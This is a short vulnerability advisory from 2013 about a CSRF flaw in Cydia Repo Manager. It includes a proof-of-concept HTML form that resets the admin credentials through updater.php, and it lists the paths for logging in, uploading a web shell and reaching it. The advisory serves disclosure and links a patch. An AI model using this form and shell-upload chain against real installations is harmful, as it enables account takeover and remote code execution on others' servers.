|
|
| |
| Cydia Repo Manager is prone to a CSRF vulnerability |
| |
Credit:
The information has been provided by Ramdan Yantu.
|
| |
Vulnerable Systems:
* Cydia Repo Manager
Proof of concept:
<form method="post" action="http://bastardlabs/[CydiaRepoManager_path]/debs/updater.php">
<input type="text" name="user" value="Username"/> <br />
<input type="text" name="pass" value="Password"/><br />
<input type="submit" name="s" value="w00tw00t!" />
</form>
Login : http://bastardlabs/[CydiaRepoManager_path]/index.php
Upload Shell : http://bastardlabs/[CydiaRepoManager_path]/deb.php
Shell : http://bastardlabs/[CydiaRepoManager_path]/downloads/shell.php
Demo :
http://bastardlabs.info/demo/CydiaRepoManager1.png
http://bastardlabs.info/demo/CydiaRepoManager2.png
http://bastardlabs.info/demo/CydiaRepoManager3.png
Patch Availability:
http://damar1st.de/downloads/CydiaRepoManager3.1.zip
Disclosure Timeline:
Published: 2013-01-16
|
|
blog comments powered by
|